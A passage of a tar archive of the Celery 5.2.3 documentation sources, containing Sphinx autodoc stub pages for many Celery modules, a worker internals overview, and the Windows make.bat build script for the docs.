celery.utils.dispatch.signal .. automodule:: celery.utils.dispatch.signal :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.functional.rst0000664000175000017500000000043200000000000025076 0ustar00asifasif00000000000000===================================================== ``celery.utils.functional`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.functional .. automodule:: celery.utils.functional :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.graph.rst0000664000175000017500000000036500000000000024042 0ustar00asifasif00000000000000========================================== ``celery.utils.graph`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.graph .. automodule:: celery.utils.graph :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.imports.rst0000664000175000017500000000042100000000000024427 0ustar00asifasif00000000000000===================================================== ``celery.utils.imports`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.imports .. automodule:: celery.utils.imports :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.iso8601.rst0000664000175000017500000000041300000000000024044 0ustar00asifasif00000000000000================================================== ``celery.utils.iso8601`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.iso8601 .. automodule:: celery.utils.iso8601 :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.log.rst0000664000175000017500000000040500000000000023515 0ustar00asifasif00000000000000===================================================== ``celery.utils.log`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.log .. automodule:: celery.utils.log :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.nodenames.rst0000664000175000017500000000040100000000000024701 0ustar00asifasif00000000000000========================================== ``celery.utils.nodenames`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.nodenames .. automodule:: celery.utils.nodenames :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.objects.rst0000664000175000017500000000041300000000000024364 0ustar00asifasif00000000000000================================================== ``celery.utils.objects`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.objects .. automodule:: celery.utils.objects :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.rst0000664000175000017500000000030300000000000022732 0ustar00asifasif00000000000000========================== ``celery.utils`` ========================== .. contents:: :local: .. currentmodule:: celery.utils .. automodule:: celery.utils :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.saferepr.rst0000664000175000017500000000040000000000000024536 0ustar00asifasif00000000000000=========================================== ``celery.utils.saferepr`` =========================================== .. contents:: :local: .. currentmodule:: celery.utils.saferepr .. automodule:: celery.utils.saferepr :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.serialization.rst0000664000175000017500000000042100000000000025607 0ustar00asifasif00000000000000============================================ ``celery.utils.serialization`` ============================================ .. contents:: :local: .. currentmodule:: celery.utils.serialization .. automodule:: celery.utils.serialization :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.sysinfo.rst0000664000175000017500000000041300000000000024425 0ustar00asifasif00000000000000================================================== ``celery.utils.sysinfo`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.sysinfo .. automodule:: celery.utils.sysinfo :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.term.rst0000664000175000017500000000041000000000000023677 0ustar00asifasif00000000000000===================================================== ``celery.utils.term`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.term .. automodule:: celery.utils.term :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.text.rst0000664000175000017500000000041000000000000023714 0ustar00asifasif00000000000000===================================================== ``celery.utils.text`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.text .. automodule:: celery.utils.text :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.threads.rst0000664000175000017500000000037300000000000024372 0ustar00asifasif00000000000000========================================== ``celery.utils.threads`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.threads .. automodule:: celery.utils.threads :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.time.rst0000664000175000017500000000040200000000000023667 0ustar00asifasif00000000000000================================================== ``celery.utils.time`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.time .. automodule:: celery.utils.time :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.timer2.rst0000664000175000017500000000034000000000000024134 0ustar00asifasif00000000000000============================== ``celery.utils.timer2`` ============================== .. contents:: :local: .. currentmodule:: celery.utils.timer2 .. automodule:: celery.utils.timer2 :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.autoscale.rst0000664000175000017500000000040000000000000025060 0ustar00asifasif00000000000000======================================== ``celery.worker.autoscale`` ======================================== .. contents:: :local: .. currentmodule:: celery.worker.autoscale .. automodule:: celery.worker.autoscale :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.components.rst0000664000175000017500000000040300000000000025270 0ustar00asifasif00000000000000======================================== ``celery.worker.components`` ======================================== .. contents:: :local: .. currentmodule:: celery.worker.components .. automodule:: celery.worker.components :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.control.rst0000664000175000017500000000040400000000000024564 0ustar00asifasif00000000000000============================================= ``celery.worker.control`` ============================================= .. contents:: :local: .. currentmodule:: celery.worker.control .. automodule:: celery.worker.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.heartbeat.rst0000664000175000017500000000041200000000000025042 0ustar00asifasif00000000000000============================================= ``celery.worker.heartbeat`` ============================================= .. contents:: :local: .. currentmodule:: celery.worker.heartbeat .. automodule:: celery.worker.heartbeat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.loops.rst0000664000175000017500000000035400000000000024244 0ustar00asifasif00000000000000==================================== ``celery.worker.loops`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.loops .. automodule:: celery.worker.loops :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.pidbox.rst0000664000175000017500000000035700000000000024400 0ustar00asifasif00000000000000==================================== ``celery.worker.pidbox`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.pidbox .. automodule:: celery.worker.pidbox :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/index.rst0000664000175000017500000000365000000000000021427 0ustar00asifasif00000000000000=========================== Internal Module Reference =========================== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 1 celery.worker.components celery.worker.loops celery.worker.heartbeat celery.worker.control celery.worker.pidbox celery.worker.autoscale celery.concurrency celery.concurrency.solo celery.concurrency.prefork celery.concurrency.eventlet celery.concurrency.gevent celery.concurrency.thread celery.concurrency.base celery.backends celery.backends.base celery.backends.asynchronous celery.backends.azureblockblob celery.backends.rpc celery.backends.database celery.backends.cache celery.backends.consul celery.backends.couchdb celery.backends.mongodb celery.backends.elasticsearch celery.backends.redis celery.backends.cassandra celery.backends.couchbase celery.backends.arangodb celery.backends.dynamodb celery.backends.filesystem celery.backends.cosmosdbsql celery.backends.s3 celery.app.trace celery.app.annotations celery.app.routes celery.security.certificate celery.security.key celery.security.serialization celery.security.utils celery.events.snapshot celery.events.cursesmon celery.events.dumper celery.backends.database.models celery.backends.database.session celery.utils celery.utils.abstract celery.utils.collections celery.utils.nodenames celery.utils.deprecated celery.utils.functional celery.utils.graph celery.utils.objects celery.utils.term celery.utils.time celery.utils.iso8601 celery.utils.saferepr celery.utils.serialization celery.utils.sysinfo celery.utils.threads celery.utils.timer2 celery.utils.imports celery.utils.log celery.utils.text celery.utils.dispatch celery.utils.dispatch.signal celery.platforms celery._state ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/worker.rst0000664000175000017500000000265400000000000017676 0ustar00asifasif00000000000000.. _internals-worker: ======================= Internals: The worker ======================= .. contents:: :local: Introduction ============ The worker consists of 4 main components: the consumer, the scheduler, the mediator and the task pool. All these components runs in parallel working with two data structures: the ready queue and the ETA schedule. Data structures =============== timer ----- The timer uses :mod:`heapq` to schedule internal functions. It's very efficient and can handle hundred of thousands of entries. Components ========== Consumer -------- Receives messages from the broker using :pypi:`Kombu`. When a message is received it's converted into a :class:`celery.worker.request.Request` object. Tasks with an ETA, or rate-limit are entered into the `timer`, messages that can be immediately processed are sent to the execution pool. ETA and rate-limit when used together will result in the rate limit being observed with the task being scheduled after the ETA. Timer ----- The timer schedules internal functions, like cleanup and internal monitoring, but also it schedules ETA tasks and rate limited tasks. If the scheduled tasks ETA has passed it is moved to the execution pool. TaskPool -------- This is a slightly modified :class:`multiprocessing.Pool`. It mostly works the same way, except it makes sure all of the workers are running at all times. If a worker is missing, it replaces it with a new one. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/make.bat0000664000175000017500000001677300000000000015250 0ustar00asifasif00000000000000@ECHO OFF REM Command file for Sphinx documentation if "%SPHINXBUILD%" == "" ( set SPHINXBUILD=sphinx-build ) set BUILDDIR=_build set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% . set I18NSPHINXOPTS=%SPHINXOPTS% . if NOT "%PAPER%" == "" ( set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS% set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS% ) if "%1" == "" goto help if "%1" == "help" ( :help echo.Please use `make ^` where ^ is one of echo. html to make standalone HTML files echo. livehtml to start a local server hosting the docs echo. dirhtml to make HTML files named index.html in directories echo. singlehtml to make a single large HTML file echo. pickle to make pickle files echo. json to make JSON files echo. htmlhelp to make HTML files and a HTML help project echo. qthelp to make HTML files and a qthelp project echo. devhelp to make HTML files and a Devhelp project echo. epub to make an epub echo. epub3 to make an epub3 echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter echo. text to make text files echo. man to make manual pages echo. texinfo to make Texinfo files echo. gettext to make PO message catalogs echo. changes to make an overview over all changed/added/deprecated items echo. xml to make Docutils-native XML files echo. pseudoxml to make pseudoxml-XML files for display purposes echo. linkcheck to check all external links for integrity echo. doctest to run all doctests embedded in the documentation if enabled echo. coverage to run coverage check of the documentation if enabled goto end ) if "%1" == "clean" ( for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i del /q /s %BUILDDIR%\* goto end ) REM Check if sphinx-build is available and fallback to Python version if any %SPHINXBUILD% 1>NUL 2>NUL if errorlevel 9009 goto sphinx_python goto sphinx_ok :sphinx_python set SPHINXBUILD=python -m sphinx.__init__ %SPHINXBUILD% 2> nul if errorlevel 9009 ( echo. echo.The 'sphinx-build' command was not found. Make sure you have Sphinx echo.installed, then set the SPHINXBUILD environment variable to point echo.to the full path of the 'sphinx-build' executable. Alternatively you echo.may add the Sphinx directory to PATH. echo. echo.If you don't have Sphinx installed, grab it from echo.http://sphinx-doc.org/ exit /b 1 ) :sphinx_ok if "%1" == "html" ( %SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html if errorlevel 1 exit /b 1 echo. echo.Build finished. The HTML pages are in %BUILDDIR%/html. goto end ) if "%1" == "dirhtml" ( %SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml if errorlevel 1 exit /b 1 echo. echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml. goto end ) if "%1" == "singlehtml" ( %SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml if errorlevel 1 exit /b 1 echo. echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml. goto end ) if "%1" == "pickle" ( %SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can process the pickle files. goto end ) if "%1" == "json" ( %SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can process the JSON files. goto end ) if "%1" == "htmlhelp" ( %SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can run HTML Help Workshop with the ^ .hhp project file in %BUILDDIR%/htmlhelp. goto end ) if "%1" == "qthelp" ( %SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can run "qcollectiongenerator" with the ^ .qhcp project file in %BUILDDIR%/qthelp, like this: echo.^> qcollectiongenerator %BUILDDIR%\qthelp\PROJ.qhcp echo.To view the help file: echo.^> assistant -collectionFile %BUILDDIR%\qthelp\PROJ.ghc goto end ) if "%1" == "devhelp" ( %SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp if errorlevel 1 exit /b 1 echo. echo.Build finished. goto end ) if "%1" == "epub" ( %SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub if errorlevel 1 exit /b 1 echo. echo.Build finished. The epub file is in %BUILDDIR%/epub. goto end ) if "%1" == "epub3" ( %SPHINXBUILD% -b epub3 %ALLSPHINXOPTS% %BUILDDIR%/epub3 if errorlevel 1 exit /b 1 echo. echo.Build finished. The epub3 file is in %BUILDDIR%/epub3. goto end ) if "%1" == "latex" ( %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex if errorlevel 1 exit /b 1 echo. echo.Build finished; the LaTeX files are in %BUILDDIR%/latex. goto end ) if "%1" == "latexpdf" ( %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex cd %BUILDDIR%/latex make all-pdf cd %~dp0 echo. echo.Build finished; the PDF files are in %BUILDDIR%/latex. goto end ) if "%1" == "latexpdfja" ( %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex cd %BUILDDIR%/latex make all-pdf-ja cd %~dp0 echo. echo.Build finished; the PDF files are in %BUILDDIR%/latex. goto end ) if "%1" == "text" ( %SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text if errorlevel 1 exit /b 1 echo. echo.Build finished. The text files are in %BUILDDIR%/text. goto end ) if "%1" == "man" ( %SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man if errorlevel 1 exit /b 1 echo. echo.Build finished. The manual pages are in %BUILDDIR%/man. goto end ) if "%1" == "texinfo" ( %SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo if errorlevel 1 exit /b 1 echo. echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo. goto end ) if "%1" == "gettext" ( %SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale if errorlevel 1 exit /b 1 echo. echo.Build finished. The message catalogs are in %BUILDDIR%/locale. goto end ) if "%1" == "changes" ( %SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes if errorlevel 1 exit /b 1 echo. echo.The overview file is in %BUILDDIR%/changes. goto end ) if "%1" == "linkcheck" ( %SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck if errorlevel 1 exit /b 1 echo. echo.Link check complete; look for any errors in the above output ^ or in %BUILDDIR%/linkcheck/output.txt. goto end ) if "%1" == "doctest" ( %SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest if errorlevel 1 exit /b 1 echo. echo.Testing of doctests in the sources finished, look at the ^ results in %BUILDDIR%/doctest/output.txt. goto end ) if "%1" == "coverage" ( %SPHINXBUILD% -b coverage %ALLSPHINXOPTS% %BUILDDIR%/coverage if errorlevel 1 exit /b 1 echo. echo.Testing of coverage in the sources finished, look at the ^ results in %BUILDDIR%/coverage/python.txt. goto end ) if "%1" == "xml" ( %SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml if errorlevel 1 exit /b 1 echo. echo.Build finished. The XML files are in %BUILDDIR%/xml. goto end ) if "%1" == "pseudoxml" ( %SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml if errorlevel 1 exit /b 1 echo. echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml. goto end ) if "%1" == "livehtml" ( sphinx-autobuild -b html --open-browser -p 7000 --watch %APP% -c . %SOURCEDIR% %BUILDDIR%/html goto end ) :end ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/reference/0000775000175000017500000000000000000000000015563 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.amqp.rst0000664000175000017500000000254300000000000021320 0ustar00asifasif00000000000000.. currentmodule:: celery.app.amqp .. automodule:: celery.app.amqp .. contents:: :local: AMQP ---- .. autoclass:: AMQP .. attribute:: Connection Broker connection class used. Default is :class:`kombu.Connection`. .. attribute:: Consumer Base Consumer class used. Default is :class:`kombu.Consumer`. .. attribute:: Producer Base Producer class used. Default is :class:`kombu.Producer`. .. attribute:: queues All currently defined task queues (a :class:`Queues` instance). .. attribute:: argsrepr_maxsize Max size of positional argument representation used for logging purposes. Default is 1024. .. attribute:: kwargsrepr_maxsize Max size of keyword argument representation used for logging purposes. Default is 1024. .. automethod:: Queues .. automethod:: Router .. automethod:: flush_routes .. autoattribute:: create_task_message .. autoattribute:: send_task_message .. autoattribute:: default_queue .. autoattribute:: default_exchange .. autoattribute:: producer_pool .. autoattribute:: router .. autoattribute:: routes Queues ------ .. autoclass:: Queues :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.autoretry.rst0000664000175000017500000000035500000000000022417 0ustar00asifasif00000000000000=================================== ``celery.app.autoretry`` =================================== .. contents:: :local: .. currentmodule:: celery.app.autoretry .. automodule:: celery.app.autoretry :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.backends.rst0000664000175000017500000000035200000000000022130 0ustar00asifasif00000000000000=================================== ``celery.app.backends`` =================================== .. contents:: :local: .. currentmodule:: celery.app.backends .. automodule:: celery.app.backends :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.builtins.rst0000664000175000017500000000041400000000000022206 0ustar00asifasif00000000000000==================================================== ``celery.app.builtins`` ==================================================== .. contents:: :local: .. currentmodule:: celery.app.builtins .. automodule:: celery.app.builtins :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.control.rst0000664000175000017500000000041100000000000022032 0ustar00asifasif00000000000000==================================================== ``celery.app.control`` ==================================================== .. contents:: :local: .. currentmodule:: celery.app.control .. automodule:: celery.app.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.defaults.rst0000664000175000017500000000044200000000000022165 0ustar00asifasif00000000000000=============================================================== ``celery.app.defaults`` =============================================================== .. contents:: :local: .. currentmodule:: celery.app.defaults .. automodule:: celery.app.defaults :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.events.rst0000664000175000017500000000033600000000000021664 0ustar00asifasif00000000000000================================ ``celery.app.events`` ================================ .. contents:: :local: .. currentmodule:: celery.app.events .. automodule:: celery.app.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.log.rst0000664000175000017500000000032500000000000021137 0ustar00asifasif00000000000000================================ ``celery.app.log`` ================================ .. contents:: :local: .. currentmodule:: celery.app.log .. automodule:: celery.app.log :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.registry.rst0000664000175000017500000000034400000000000022227 0ustar00asifasif00000000000000================================ ``celery.app.registry`` ================================ .. contents:: :local: .. currentmodule:: celery.app.registry .. automodule:: celery.app.registry :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.rst0000664000175000017500000000044000000000000020355 0ustar00asifasif00000000000000.. currentmodule:: celery.app .. automodule:: celery.app .. contents:: :local: Proxies ------- .. autodata:: default_app Functions --------- .. autofunction:: app_or_default .. autofunction:: enable_trace .. autofunction:: disable_trace ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.task.rst0000664000175000017500000000034200000000000021317 0ustar00asifasif00000000000000=================================== ``celery.app.task`` =================================== .. contents:: :local: .. currentmodule:: celery.app.task .. automodule:: celery.app.task :members: Task, Context, TaskType ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.utils.rst0000664000175000017500000000033300000000000021515 0ustar00asifasif00000000000000================================ ``celery.app.utils`` ================================ .. contents:: :local: .. currentmodule:: celery.app.utils .. automodule:: celery.app.utils :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.apps.beat.rst0000664000175000017500000000037500000000000021461 0ustar00asifasif00000000000000================================================= ``celery.apps.beat`` ================================================= .. contents:: :local: .. currentmodule:: celery.apps.beat .. automodule:: celery.apps.beat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.apps.multi.rst0000664000175000017500000000035400000000000021675 0ustar00asifasif00000000000000======================================= ``celery.apps.multi`` ======================================= .. contents:: :local: .. currentmodule:: celery.apps.multi .. automodule:: celery.apps.multi :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.apps.worker.rst0000664000175000017500000000035700000000000022057 0ustar00asifasif00000000000000======================================= ``celery.apps.worker`` ======================================= .. contents:: :local: .. currentmodule:: celery.apps.worker .. automodule:: celery.apps.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.beat.rst0000664000175000017500000000033400000000000020512 0ustar00asifasif00000000000000======================================== ``celery.beat`` ======================================== .. contents:: :local: .. currentmodule:: celery.beat .. automodule:: celery.beat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.base.rst0000664000175000017500000000033000000000000021254 0ustar00asifasif00000000000000================================ ``celery.bin.base`` ================================ .. contents:: :local: .. currentmodule:: celery.bin.base .. automodule:: celery.bin.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.beat.rst0000664000175000017500000000037600000000000021267 0ustar00asifasif00000000000000=================================================== ``celery.bin.beat`` =================================================== .. contents:: :local: .. currentmodule:: celery.bin.beat .. automodule:: celery.bin.beat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.call.rst0000664000175000017500000000040200000000000021255 0ustar00asifasif00000000000000===================================================== ``celery.bin.call`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.call .. automodule:: celery.bin.call :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.celery.rst0000664000175000017500000000036200000000000021632 0ustar00asifasif00000000000000========================================== ``celery.bin.celery`` ========================================== .. contents:: :local: .. currentmodule:: celery.bin.celery .. automodule:: celery.bin.celery :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.control.rst0000664000175000017500000000041300000000000022024 0ustar00asifasif00000000000000===================================================== ``celery.bin.control`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.control .. automodule:: celery.bin.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.events.rst0000664000175000017500000000041000000000000021645 0ustar00asifasif00000000000000===================================================== ``celery.bin.events`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.events .. automodule:: celery.bin.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.graph.rst0000664000175000017500000000040500000000000021446 0ustar00asifasif00000000000000===================================================== ``celery.bin.graph`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.graph .. automodule:: celery.bin.graph :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.list.rst0000664000175000017500000000040200000000000021315 0ustar00asifasif00000000000000===================================================== ``celery.bin.list`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.list .. automodule:: celery.bin.list :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.logtool.rst0000664000175000017500000000041300000000000022023 0ustar00asifasif00000000000000===================================================== ``celery.bin.logtool`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.logtool .. automodule:: celery.bin.logtool :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.migrate.rst0000664000175000017500000000041300000000000021774 0ustar00asifasif00000000000000===================================================== ``celery.bin.migrate`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.migrate .. automodule:: celery.bin.migrate :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.multi.rst0000664000175000017500000000037100000000000021501 0ustar00asifasif00000000000000=============================================== ``celery.bin.multi`` =============================================== .. contents:: :local: .. currentmodule:: celery.bin.multi .. automodule:: celery.bin.multi :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.purge.rst0000664000175000017500000000040500000000000021467 0ustar00asifasif00000000000000===================================================== ``celery.bin.purge`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.purge .. automodule:: celery.bin.purge :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.result.rst0000664000175000017500000000041000000000000021657 0ustar00asifasif00000000000000===================================================== ``celery.bin.result`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.result .. automodule:: celery.bin.result :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.shell.rst0000664000175000017500000000040500000000000021454 0ustar00asifasif00000000000000===================================================== ``celery.bin.shell`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.shell .. automodule:: 